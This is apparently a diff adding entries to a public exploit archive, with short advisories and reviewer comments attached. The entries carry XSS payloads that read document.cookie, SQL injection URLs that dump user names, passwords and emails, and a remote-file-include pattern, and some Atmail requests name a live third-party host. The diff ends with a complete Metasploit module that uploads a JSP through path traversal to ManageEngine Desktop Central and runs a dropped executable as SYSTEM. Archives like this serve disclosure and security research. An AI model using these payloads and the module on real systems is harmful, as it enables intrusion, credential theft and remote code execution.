define('ENTRY_PASSWORD_NEW', 'New Password:');
|
||||
define('ENTRY_PASSWORD_NEW_TEXT', '*');
|
||||
define('ENTRY_PASSWORD_NEW_ERROR', 'Your new Password must contain a minimum of ' . ENTRY_PASSWORD_MIN_LENGTH . ' characters.');
|
||||
define('ENTRY_PASSWORD_NEW_ERROR_NOT_MATCHING', 'The Password Confirmation must match your new Password.');
|
||||
define('PASSWORD_HIDDEN', '--HIDDEN--');
|
||||
|
||||
define('FORM_REQUIRED_INFORMATION', '* Required information');
|
||||
|
||||
// constants for use in tep_prev_next_display function
|
||||
define('TEXT_RESULT_PAGE', 'Result Pages:');
|
||||
define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> products)');
|
||||
define('TEXT_DISPLAY_NUMBER_OF_ORDERS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> orders)');
|
||||
define('TEXT_DISPLAY_NUMBER_OF_REVIEWS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> reviews)');
|
||||
define('TEXT_DISPLAY_NUMBER_OF_PRODUCTS_NEW', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> new products)');
|
||||
define('TEXT_DISPLAY_NUMBER_OF_SPECIALS', 'Displaying <strong>%d</strong> to <strong>%d</strong> (of <strong>%d</strong> specials)');
|
||||
|
||||
define('PREVNEXT_TITLE_FIRST_PAGE', 'First Page');
|
||||
define('PREVNEXT_TITLE_PREVIOUS_PAGE', 'Previous Page');
|
||||
define('PREVNEXT_TITLE_NEXT_PAGE', 'Next Page');
|
||||
define('PREVNEXT_TITLE_LAST_PAGE', 'Last Page');
|
||||
define('PREVNEXT_TITLE_PAGE_NO', 'Page %d');
|
||||
define('PREVNEXT_TITLE_PREV_SET_OF_NO_PAGE', 'Previous Set of %d Pages');
|
||||
define('PREVNEXT_TITLE_NEXT_SET_OF_NO_PAGE', 'Next Set of %d Pages');
|
||||
define('PREVNEXT_BUTTON_FIRST', '<<FIRST');
|
||||
define('PREVNEXT_BUTTON_PREV', '[<< Prev]');
|
||||
define('PREVNEXT_BUTTON_NEXT', '[Next >>]');
|
||||
define('PREVNEXT_BUTTON_LAST', 'LAST>>');
|
||||
|
||||
define('IMAGE_BUTTON_ADD_ADDRESS', 'Add Address');
|
||||
define('IMAGE_BUTTON_ADDRESS_BOOK', 'Address Book');
|
||||
define('IMAGE_BUTTON_BACK', 'Back');
|
||||
define('IMAGE_BUTTON_BUY_NOW', 'Buy Now');
|
||||
define('IMAGE_BUTTON_CHANGE_ADDRESS', 'Change Address');
|
||||
define('IMAGE_BUTTON_CHECKOUT', 'Checkout');
|
||||
define('IMAGE_BUTTON_CONFIRM_ORDER', 'Confirm Order');
|
||||
define('IMAGE_BUTTON_CONTINUE', 'Continue');
|
||||
define('IMAGE_BUTTON_CONTINUE_SHOPPING', 'Continue Shopping');
|
||||
define('IMAGE_BUTTON_DELETE', 'Delete');
|
||||
define('IMAGE_BUTTON_EDIT_ACCOUNT', 'Edit Account');
|
||||
define('IMAGE_BUTTON_HISTORY', 'Order History');
|
||||
define('IMAGE_BUTTON_LOGIN', 'Sign In');
|
||||
define('IMAGE_BUTTON_IN_CART', 'Add to Cart');
|
||||
define('IMAGE_BUTTON_NOTIFICATIONS', 'Notifications');
|
||||
define('IMAGE_BUTTON_QUICK_FIND', 'Quick Find');
|
||||
define('IMAGE_BUTTON_REMOVE_NOTIFICATIONS', 'Remove Notifications');
|
||||
define('IMAGE_BUTTON_REVIEWS', 'Reviews');
|
||||
define('IMAGE_BUTTON_SEARCH', 'Search');
|
||||
define('IMAGE_BUTTON_SHIPPING_OPTIONS', 'Shipping Options');
|
||||
define('IMAGE_BUTTON_TELL_A_FRIEND', 'Tell a Friend');
|
||||
define('IMAGE_BUTTON_UPDATE', 'Update');
|
||||
define('IMAGE_BUTTON_UPDATE_CART', 'Update Cart');
|
||||
define('IMAGE_BUTTON_WRITE_REVIEW', 'Write Review');
|
||||
|
||||
define('SMALL_IMAGE_BUTTON_DELETE', 'Delete');
|
||||
define('SMALL_IMAGE_BUTTON_EDIT', 'Edit');
|
||||
define('SMALL_IMAGE_BUTTON_VIEW', 'View');
|
||||
|
||||
define('ICON_ARROW_RIGHT', 'more');
|
||||
define('ICON_CART', 'In Cart');
|
||||
define('ICON_ERROR', 'Error');
|
||||
define('ICON_SUCCESS', 'Success');
|
||||
define('ICON_WARNING', 'Warning');
|
||||
|
||||
define('TEXT_GREETING_PERSONAL', 'Welcome back <span class="greetUser">%s!</span> Would you like to see which <a href="%s"><u>new products</u></a> are available to purchase?');
|
||||
define('TEXT_GREETING_PERSONAL_RELOGON', '<small>If you are not %s, please <a href="%s"><u>log yourself in</u></a> with your account information.</small>');
|
||||
define('TEXT_GREETING_GUEST', 'Welcome <span class="greetUser">Guest!</span> Would you like to <a href="%s"><u>log yourself in</u></a>? Or would you prefer to <a href="%s"><u>create an account</u></a>?');
|
||||
|
||||
define('TEXT_SORT_PRODUCTS', 'Sort products ');
|
||||
define('TEXT_DESCENDINGLY', 'descendingly');
|
||||
define('TEXT_ASCENDINGLY', 'ascendingly');
|
||||
define('TEXT_BY', ' by ');
|
||||
|
||||
define('TEXT_REVIEW_BY', 'by %s');
|
||||
define('TEXT_REVIEW_WORD_COUNT', '%s words');
|
||||
define('TEXT_REVIEW_RATING', 'Rating: %s [%s]');
|
||||
define('TEXT_REVIEW_DATE_ADDED', 'Date Added: %s');
|
||||
define('TEXT_NO_REVIEWS', 'There are currently no product reviews.');
|
||||
|
||||
define('TEXT_NO_NEW_PRODUCTS', 'There are currently no products.');
|
||||
|
||||
define('TEXT_UNKNOWN_TAX_RATE', 'Unknown tax rate');
|
||||
|
||||
define('TEXT_REQUIRED', '<span class="errorText">Required</span>');
|
||||
|
||||
define('ERROR_TEP_MAIL', '<font face="Verdana, Arial" size="2" color="#ff0000"><strong><small>TEP ERROR:</small> Cannot send the email through the specified SMTP server. Please check your php.ini setting and correct the SMTP server if necessary.</strong></font>');
|
||||
|
||||
define('TEXT_CCVAL_ERROR_INVALID_DATE', 'The expiry date entered for the credit card is invalid. Please check the date and try again.');
|
||||
define('TEXT_CCVAL_ERROR_INVALID_NUMBER', 'The credit card number entered is invalid. Please check the number and try again.');
|
||||
define('TEXT_CCVAL_ERROR_UNKNOWN_CARD', 'The first four digits of the number entered are: %s. If that number is correct, we do not accept that type of credit card. If it is wrong, please try again.');
|
||||
|
||||
define('FOOTER_TEXT_BODY', 'Copyright © ' . date('Y') . ' <a href="' . tep_href_link(FILENAME_DEFAULT) . '">' . STORE_NAME . '</a><br />Powered by <a href="http://www.oscommerce.com" target="_blank">osCommerce</a>');
|
||||
?>
|
||||
" />
|
||||
<input type="submit" value="Go" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
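--- /dev/null
+++ b/platforms/php/webapps/34585.txt
@@ -0,0 +1,80 @@
+#Title: Atmail Webmail =>7.2 - Multiple XSS & FPD
+#Date: 01.27.2014
+#Vendor: atmail.com
+#Version: =>7.2 (Latest ATM), tested also on 7.1.1
+#Authors: Smash_ & Brag / smash[at]devilteam.pl
+#PoC: poczta.pl / demo.atmail.com
+
+1. Cross Site Scripting
+
+a) GET - viewmessageTabNumber
+
+Request:
+host/mail/index.php/mail/composemessage/index/viewmessageTabNumber/3"><h1>XSS<!--
+
+Injection point (line 16):
+<input type="hidden" name="tabId" value="viewmessageTab3"><h1>XSS<!--
+
+PoC:
+https://www.poczta.pl/mail/index.php/mail/composemessage/index/viewmessageTabNumber/3"><h1>XSS<!--
+
+b) POST - filter
+
+
+POST /mail/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX.666/resultContext/searchResultsTab1 HTTP/1.1
+Host: www.poczta.pl
+searchQuery=&goBack=6&from=&to=&subject=&body=&filter=<script>alert(666)</script>
+
+Alert will appear; injection point:
+<div id=\"noMessageDisplay\" style=\"margin:10px;\">\n\t\t\t\tFound no messages matching <script>alert(666) (...)
+
+c) POST - Search Results Tab
+
+Request:
+POST /mail/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab1"%20whats="up"%20bad=" HTTP/1.1
+Host: http://www.poczta.pl
+
+Injection point:
+<input type=\"hidden\" name=\"resultContext\" id=\"resultContext\" value=\"searchResultsTab1\" whats=\"up\" bad=\"\" \/>
+
+d) POST - page
+
+Request:
+POST /mail/index.php/mail/mail/listfoldermessages/selectFolder/INBOX/page/2"%20xss="true"%20bad=" HTTP/1.1
+Host: www.poczta.pl
+
+Injection point:
+<input type=\"hidden\" name=\"pageNumber\" id=\"pageNumber\" value=\"2\" xss=\"true\" bad=\"\" \/>
+
+
+2. Full Path Disclosure
+
+Request (GET):
+demo.atmail.com/mail/index.php/mail/mail/listfoldermessages/
+
+Response:
+An error occurred
+script 'mail/listfoldermessages.phtml' not found in path (/usr/local/atmail/webmail/application/modules/mail/views/scripts/)
+
+3. Persistent XSS - Theme Color
+
+Request:
+GET /mail/index.php/mail/settings/webmailsave?fields%5BcssColorTheme%5D=purple"%20onload=alert(666)%20bad="&save=1 HTTP/1.1
+Host: www.poczta.pl
+
+Now, whenever someone will login alert will appear.
+Injection point:
+<body class="leaderboard-ad-off footer-ad-off '"XSS fresh blue" onload=alert(666) bad="" id="calon">
+
+4. Persistent XSS - Forward a Message
+
+First, compose your message and attach an image. Image name should consist
+JS code, for example: "><img src=x onerror=prompt(1)>.
+
+Send message to a victim, whenever someone will 'Forward' the message,
+JS will be executed:
+
+<a class=\"attach-btn\" href=\"#\" onClick=\"removeAttachment('bobs.\\\"><img src=x onerror=prompt(1)> (...)
+
+P.S - Login and password are sent as plaintext.
+... which is bad.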
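Review bot: The affected-version notation in the title and `#Version` line, `=>7.2`, reads as "7.2 and newer", yet the same line calls 7.2 the latest release and says 7.1.1 was also tested, so the intended range is almost certainly "up to and including 7.2"; `<= 7.2` would remove the ambiguity. The PoC requests and `Host:` headers name a live third-party deployment (www.poczta.pl) rather than a placeholder, which an advisory should avoid; `host/` as used in the first request is enough. The closing claim that login credentials travel in plaintext is not backed by anything shown here, and the one full PoC URL in the file is `https://`, so that line needs either the observed request or should be dropped.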
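--- /dev/null
+++ b/platforms/php/webapps/34596.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/42967/info
+
+Pligg CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Pligg CMS 1.0.4 is vulnerable; other versions may also be affected.
+
+The following example URIs are available:
+
+http://www.example.com//pliggcms_1_0_4/login.php?email=sql'injection&processlogin=3&return=%2fpliggcms_1_0_4%2f
+http://www.example.com/pliggcms_1_0_4/user.php?category=%22%20onmouseover%3dprompt%28938687%29%20bad%3d%22&id=&keyword=Search..&login=&module=&page=&search=&view=search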
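Review bot: The two example URIs do not say which one demonstrates which issue, although the text describes both an SQL injection and an XSS; a one-line label before each (`SQL injection, email parameter of login.php:` and `XSS, category parameter of user.php:`) would make the file usable without the external BID reference. The first URI also carries a doubled slash (`//pliggcms_1_0_4/`) that the second does not, which looks like a copy error rather than part of the payload.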
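--- /dev/null
+++ b/platforms/php/webapps/34597.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42973/info
+
+Datetopia Buy Dating Site is prone to a cross-site scripting vulnerability because the it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/profile.php?profile_id=568&s_r="><script>alert(document.cookie);</script>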
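--- /dev/null
+++ b/platforms/php/webapps/34598.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42974/info
+
+SZNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+SZNews 2.7 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/printnews.php3?id=[shell.txt?]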
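Review bot: The PoC placeholder `[shell.txt?]` does not say that the value has to be a full remote URL for this to be a remote file include, and the purpose of the trailing `?` is left unexplained; a reader unfamiliar with the idiom cannot reproduce it from this line alone. A short lead-in such as `id must be a full URL to attacker-hosted PHP, e.g. http://attacker/shell.txt?; the trailing ? turns whatever the script appends after id into a query string` would make the file self-contained (the appended-suffix behaviour is presumed from the idiom, not shown here).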
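--- /dev/null
+++ b/platforms/php/webapps/34599.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/42975/info
+
+HotelBook is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/hotel.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
+http://www.example.com/details.php?hotel_id=1'+UNION+SELECT+0,0,0,0,0,CONCAT_WS(0x3a3a,user_name,password,email),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+user/*
+http://www.example.com/roomtypes.php?hotel_id=1'+UNION+SELECT+0,0,CONCAT_WS(0x3a3a3a3a3a,user_name,password,email),0,0,0,0,0,0,0,0+FROM+user/*
+http://www.example.com/photos.php?hotel_id=1' << SQL >>
+http://www.example.com/map.php?hotel_id=1' << SQL >>
+http://www.example.com/weather.php?hotel_id=1' << SQL >>
+http://www.example.com/reviews.php?hotel_id=1' << SQL >>
+http://www.example.com/book.php?hotel_id=1' << SQL >>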
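--- /dev/null
+++ b/platforms/php/webapps/34600.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42976/info
+
+Datetopia Match Agency BiZ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/edit_profile.php?important="><script>alert(document.cookie);</script>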
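--- /dev/null
+++ b/platforms/php/webapps/34601.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/42976/info
+
+Datetopia Match Agency BiZ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/report.php?pid="><script>alert(document.cookie);</script>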
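--- /dev/null
+++ b/platforms/windows/dos/34602.html
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/42993/info
+
+Microsoft Internet Explorer is prone to a cross-domain information-disclosure vulnerability because the application fails to enforce the same-origin policy.
+
+An attacker can exploit this issue by enticing an unsuspecting user into viewing a page containing malicious content.
+
+Successful exploits will allow attackers to bypass the same-origin policy and obtain potentially sensitive information; other attacks are possible.
+
+This issue affects Internet Explorer 6, 7, and 8.
+
+<html> <head> <style> @import url("http://www.example.com/hi_heige"); </style> <script> function loaded() { alert(document.styleSheets(0).imports(0).cssText); } </script> </head> <body onload="loaded()"> </body> </html>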
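Review bot: The PoC never says what the `@import` target has to be, and the placeholder `http://www.example.com/hi_heige` hides the essential condition: for the `cssText` readout to disclose anything, the URL must point at a cross-origin resource the victim is already authorised to fetch (e.g. a page behind the victim's own cookies), not an arbitrary public file; a one-line comment above the markup stating that would make the file reproducible. The `document.styleSheets(0).imports(0)` paren-indexing is IE-only, which is consistent with the "IE 6, 7, and 8" scope but worth noting since the snippet will simply throw elsewhere. The whole document is collapsed onto one line; splitting it onto conventional lines would not change behaviour and would make the `.html` file readable.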
169
platforms/windows/remote/34594.rb
Executable file
|
@ -0,0 +1,169 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ManageEngine Desktop Central StatusUpdate Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary file upload vulnerability in ManageEngine DesktopCentral
|
||||
v7 to v9 build 90054 (including the MSP versions).
|
||||
A malicious user can upload a JSP file into the web root without authentication, leading to
|
||||
arbitrary code execution as SYSTEM. Some early builds of version 7 are not exploitable as
|
||||
they do not ship with a bundled Java compiler.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-5005'],
|
||||
['OSVDB', '110643'],
|
||||
['URL', 'http://seclists.org/fulldisclosure/2014/Aug/88'],
|
||||
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/me_dc9_file_upload.txt']
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Desktop Central v7 to v9 build 90054 / Windows', {} ]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Aug 31 2014'
|
||||
))
|
||||
|
||||
register_options([Opt::RPORT(8020)], self.class)
|
||||
end
|
||||
|
||||
|
||||
# Test for Desktop Central
|
||||
def check
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri("configurations.do"),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if res && res.code == 200
|
||||
build = nil
|
||||
|
||||
if res.body.to_s =~ /ManageEngine Desktop Central 7/ ||
|
||||
res.body.to_s =~ /ManageEngine Desktop Central MSP 7/ # DC v7
|
||||
|
||||
print_status("#{peer} - Detected Desktop Central v7")
|
||||
elsif res.body.to_s =~ /ManageEngine Desktop Central 8/ ||
|
||||
res.body.to_s =~ /ManageEngine Desktop Central MSP 8/
|
||||
|
||||
if res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v8 (later versions)
|
||||
build = $1
|
||||
print_status("#{peer} - Detected Desktop Central v8 #{build}")
|
||||
else # DC v8 (earlier versions)
|
||||
print_status("#{peer} - Detected Desktop Central v8")
|
||||
end
|
||||
elsif res.body.to_s =~ /id="buildNum" value="([0-9]+)"\/>/ # DC v9 (and higher?)
|
||||
build = $1
|
||||
end
|
||||
|
||||
if build.nil?
|
||||
return Exploit::CheckCode::Unknown
|
||||
elsif Gem::Version.new(build) < Gem::Version.new("90055")
|
||||
return Exploit::CheckCode::Appears
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
print_status("#{peer} - Uploading JSP to execute the payload")
exe = payload.encoded_exe
exe_filename = rand_text_alpha_lower(8) + ".exe"
jsp_payload = jsp_drop_and_execute(exe, exe_filename)
jsp_name = rand_text_alpha_lower(8) + ".jsp"
send_request_cgi({
'uri' => normalize_uri('statusUpdate'),
'method' => 'POST',
'data' => jsp_payload,
'ctype' => 'text/html',
'vars_get' => {
'actionToCall' => 'LFU',
'configDataID' => '1',
'customerId' => rand_text_numeric(4),
'fileName' => '../' * 6 << jsp_name
}
})
# We could check for HTTP 200 and a "success" string.
# However only some later v8 and v9 versions return this; and we don't really care
# and do a GET to the file we just uploaded anyway.
register_files_for_cleanup(exe_filename)
register_files_for_cleanup("..\\webapps\\DesktopCentral\\#{jsp_name}")
print_status("#{peer} - Executing payload")
send_request_cgi(
{
'uri' => normalize_uri(jsp_name),
'method' => 'GET'
})
end
def jsp_drop_bin(bin_data, output_file)
jspraw = %Q|<%@ page import="java.io.*" %>\n|
jspraw << %Q|<%\n|
jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
jspraw << %Q|int numbytes = data.length();\n|
jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
jspraw << %Q|{\n|
jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
jspraw << %Q| comb <<= 4;\n|
jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
jspraw << %Q|}\n|
jspraw << %Q|outputstream.write(bytes);\n|
jspraw << %Q|outputstream.close();\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_execute_command(command)
jspraw = %Q|\n|
jspraw << %Q|<%\n|
jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
jspraw << %Q|%>\n|
jspraw
end
def jsp_drop_and_execute(bin_data, output_file)
jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
end
end